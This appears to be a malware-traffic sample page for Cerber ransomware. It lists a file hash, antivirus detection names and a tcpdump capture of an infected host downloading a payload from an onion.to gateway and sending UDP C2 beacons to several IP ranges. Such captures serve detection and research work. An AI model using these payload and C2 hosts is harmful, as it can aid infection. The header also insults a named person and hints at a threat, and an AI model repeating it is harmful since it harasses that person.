Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Cerber Zerber Ransomware Trojan Malware oamnohndpiwpicgm.onion.to 194.165.16.* UDP C2 PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap dat_onion
    Date added: January 16, 2017 7:32 am Added by: admin File size: 106 KB Downloads: 90
SHA256: 7dd82320953cc4257259ec4bba37ee6485493d49ac35428918ea4a0d36988cd9
File name: 63b873380be779512d2ff1acdc2cc063.dat
Detection ratio: 40 / 55
Analysis date: 2017-01-16 07:28:17 UTC ( 0 minutes ago )
AegisLab Troj.Ransom.W32.Zerber!c 20170116
AhnLab-V3 Trojan/Win32.Cerber.R191828 20170116
Arcabit Trojan.Generic.D3B3C08 20170116
Avast Win32:Trojan-gen 20170116
Avira (no cloud) TR/Crypt.Xpack.ptihk 20170116
BitDefender Trojan.GenericKD.3881992 20170116
Bkav HW32.Packed.D860 20170114
CAT-QuickHeal Ransom.Cerber.B 20170116
CrowdStrike Falcon (ML) malicious_confidence_82% (W) 20161024
Cyren W32/Trojan.TLPW-4766 20170116
DrWeb Trojan.Encoder.7233 20170116
ESET-NOD32 NSIS/Injector.MM 20170116
Emsisoft Trojan-Ransom.Cerber (A) 20170116

2017-01-15 23:24:56.595989 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 0:331, ack 1, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
E..sf.@….6…f.$…..P…..#~rP…….GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

2017-01-15 23:25:05.181614 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
E…L.@……..f.@J….P<…a..*P…….GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive

2017-01-15 23:25:05.264474 IP 192.168.1.102.56837 > 75.75.75.75.53: 15743+ A? shell.windows.com. (35)
E..?………..fKKKK…5.+.Z=…………shell.windows.com…..
2017-01-15 23:25:05.280898 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 344, win 255, length 0
E..(L.@….w…f.@J….P<…a…P…i………
2017-01-15 23:25:05.523123 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 345, win 255, length 0
E..(L   @….v…f.@J….P<…a…P…i………
2017-01-15 23:25:10.559228 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 331:662, ack 145, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
E..sf{@……..f.$…..P…2.#..P….<..GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

2017-01-15 23:26:41.145409 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 416:885, ack 4922, win 258, length 469
E…].@……..f.`&@…………P…BA………..`F.T.. ..6.09l….Z’…*.y*+..wu..2E….Ih…<..:.; ]…#..X.]~_iC……cq…..J;9.w:.\.jU.wh..a…{.O=!pK.L*.U.k…nH..40|.+3…..>…0.+.1.H.[r…`
….wY.`.\x..<sg'[……….j.@q..]………%. …j……_)2na..-.g..p…j…].Q..0Lc….U..’p`’..Y…..u.?.4….f<…..y..wn..p….2..p`f2..’;dT.h…..R9..;…9…,.[Nz.”.d..Js\$.>s..s….QR.d….j.7pE9.b…4….a.s./.O..$…gq:d..+zE…{~I…8.mZ=.|..U.?O….%.IP.*.^…[…..  ……..W…..N.@?VW.`.}0.Q….
2017-01-15 23:26:41.182203 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 7842, win 258, length 0
E..(].@….X…f.`&@………..LP…b………
2017-01-15 23:26:41.183483 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 10762, win 258, length 0
E..(].@….W…f.`&@…………P…W?……..
2017-01-15 23:26:41.184075 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12335, win 258, length 0
E..(].@….V…f.`&@…………P…Q………
2017-01-15 23:26:41.184772 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 885:970, ack 12335, win 258, length 85
E..}].@……..f.`&@…………P…O…….PU…,.m..U.E.;.y….A=………8@..w…..3Gg…f…..s\..~…c.H.qn4n..i.VQ.n.:4
2017-01-15 23:26:41.184840 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [F.], seq 970, ack 12335, win 258, length 0
E..(].@….T…f.`&@…………P…P………
2017-01-15 23:26:41.205735 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12336, win 258, length 0
E..(].@….S…f.`&@…………P…P………
2017-01-15 23:26:49.285306 IP 192.168.1.102.57428 > 15.49.2.0.6892: UDP, length 10
E..&Xb…..&…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285682 IP 192.168.1.102.57428 > 15.49.2.1.6892: UDP, length 10
E..&……P….f.1…T……hi005c9027……..
2017-01-15 23:26:49.285739 IP 192.168.1.102.57428 > 15.49.2.2.6892: UDP, length 10
E..&………..f.1…T……hi005c9027……..
2017-01-15 23:26:49.285790 IP 192.168.1.102.57428 > 15.49.2.3.6892: UDP, length 10
E..&0
….8{…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285840 IP 192.168.1.102.57428 > 15.49.2.4.6892: UDP, length 10
E..&……\….f.1…T……hi005c9027……..
2017-01-15 23:26:49.285890 IP 192.168.1.102.57428 > 15.49.2.5.6892: UDP, length 10
E..&D:….$I…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285940 IP 192.168.1.102.57428 > 15.49.2.6.6892: UDP, length 10
E..&,V….<,…f.1…T……hi005c9027……..
2017-01-15 23:26:49.285942 IP 192.168.1.102.57428 > 15.49.2.7.6892: UDP, length 10
E..&c……….f.1…T……hi005c9027……..
2017-01-15 23:26:49.286028 IP 192.168.1.102.57428 > 15.49.2.8.6892: UDP, length 10
E..&1…..6….f.1…T……hi005c9027……..
2017-01-15 23:26:49.286078 IP 192.168.1.102.57428 > 15.49.2.9.6892: UDP, length 10
E..&~5…..I…f.1.     .T……hi005c9027……..
2017-01-15 23:26:49.286080 IP 192.168.1.102.57428 > 15.49.2.10.6892: UDP, length 10
E..&.S….R+…f.1.
.T……hi005c9027……..

2017-01-15 23:26:49.287148 IP 192.168.1.102.57428 > 122.1.13.0.6892: UDP, length 10
E..&}…..u….fz….T……hi005c9027……..
2017-01-15 23:26:49.287150 IP 192.168.1.102.57428 > 122.1.13.1.6892: UDP, length 10
E..&2……
…fz….T……hi005c9027……..
2017-01-15 23:26:49.287198 IP 192.168.1.102.57428 > 122.1.13.2.6892: UDP, length 10
E..&Z……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287286 IP 192.168.1.102.57428 > 122.1.13.3.6892: UDP, length 10
E..&.z…..:…fz….T……hi005c9027……..
2017-01-15 23:26:49.287336 IP 192.168.1.102.57428 > 122.1.13.4.6892: UDP, length 10
E..&/……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287386 IP 192.168.1.102.57428 > 122.1.13.5.6892: UDP, length 10
E..&aJ…..h…fz….T……hi005c9027……..
2017-01-15 23:26:49.287388 IP 192.168.1.102.57428 > 122.1.13.6.6892: UDP, length 10
E..&    &………fz….T……hi005c9027……..
2017-01-15 23:26:49.287472 IP 192.168.1.102.57428 > 122.1.13.7.6892: UDP, length 10
E..&F……….fz….T……hi005c9027……..
2017-01-15 23:26:49.287522 IP 192.168.1.102.57428 > 122.1.13.8.6892: UDP, length 10
E..&………..fz….T……hi005c9027……..
2017-01-15 23:26:49.287572 IP 192.168.1.102.57428 > 122.1.13.9.6892: UDP, length 10
E..&[e…..I…fz..     .T……hi005c9027……..
2017-01-15 23:26:49.287574 IP 192.168.1.102.57428 > 122.1.13.10.6892: UDP, length 10
E..&3C…..j…fz.
.T……hi005c9027……..
2017-01-15 23:26:49.287657 IP 192.168.1.102.57428 > 122.1.13.11.6892: UDP, length 10
E..&|…..v!…fz….T…..
hi005c9027……..

2017-01-15 23:26:49.288685 IP 192.168.1.102.57428 > 194.165.16.1.6892: UDP, length 10
E..&uK….1….f…..T….6phi005c9027……..
2017-01-15 23:26:49.288734 IP 192.168.1.102.57428 > 194.165.16.2.6892: UDP, length 10
E..&.1………f…..T….6ohi005c9027……..
2017-01-15 23:26:49.288737 IP 192.168.1.102.57428 > 194.165.16.3.6892: UDP, length 10
E..&R…..Tw…f…..T….6nhi005c9027……..
2017-01-15 23:26:49.288786 IP 192.168.1.102.57428 > 194.165.16.4.6892: UDP, length 10
E..&i!….=….f…..T….6mhi005c9027……..
2017-01-15 23:26:49.288866 IP 192.168.1.102.57428 > 194.165.16.5.6892: UDP, length 10
E..&&……e…f…..T….6lhi005c9027……..
2017-01-15 23:26:49.288916 IP 192.168.1.102.57428 > 194.165.16.6.6892: UDP, length 10
E..&N…..XF…f…..T….6khi005c9027……..
2017-01-15 23:26:49.288919 IP 192.168.1.102.57428 > 194.165.16.7.6892: UDP, length 10
E..&………..f…..T….6jhi005c9027……..
2017-01-15 23:26:49.288966 IP 192.168.1.102.57428 > 194.165.16.8.6892: UDP, length 10
E..&S…..S….f…..T….6ihi005c9027……..
2017-01-15 23:26:49.289051 IP 192.168.1.102.57428 > 194.165.16.9.6892: UDP, length 10
E..&…….D…f…     .T….6hhi005c9027……..
2017-01-15 23:26:49.289100 IP 192.168.1.102.57428 > 194.165.16.10.6892: UDP, length 10
E..&t…..2’…f…
.T….6ghi005c9027……..

2017-01-15 23:26:52.735146 IP 192.168.1.102.57429 > 194.165.17.244.6892: UDP, length 24
E..4Si….Q….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735196 IP 192.168.1.102.57429 > 194.165.17.245.6892: UDP, length 24
E..4…….O…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735198 IP 192.168.1.102.57429 > 194.165.17.246.6892: UDP, length 24
E..4l…..8p…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735279 IP 192.168.1.102.57429 > 194.165.17.247.6892: UDP, length 24
E..4+…..z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735329 IP 192.168.1.102.57429 > 194.165.17.248.6892: UDP, length 24
E..4yd….+….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735379 IP 192.168.1.102.57429 > 194.165.17.249.6892: UDP, length 24
E..4>…..f>…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.735381 IP 192.168.1.102.57429 > 194.165.17.250.6892: UDP, length 24
E..4V…..Na…f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746310 IP 192.168.1.102.57429 > 194.165.17.251.6892: UDP, length 24
E..4!……….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746315 IP 192.168.1.102.57429 > 194.165.17.252.6892: UDP, length 24
E..4*~….z….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746317 IP 192.168.1.102.57429 > 194.165.17.253.6892: UDP, length 24
E..4m8….7….f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:52.746320 IP 192.168.1.102.57429 > 194.165.17.254.6892: UDP, length 24
E..4.\………f…..U… ..8870f233185a005c950110f5
2017-01-15 23:26:53.725719 IP 192.168.1.102.57429 > 194.165.17.255.6892: UDP, length 24
E..4R…..R …f…..U… ..8870f233185a005c950110f5

Leave a Reply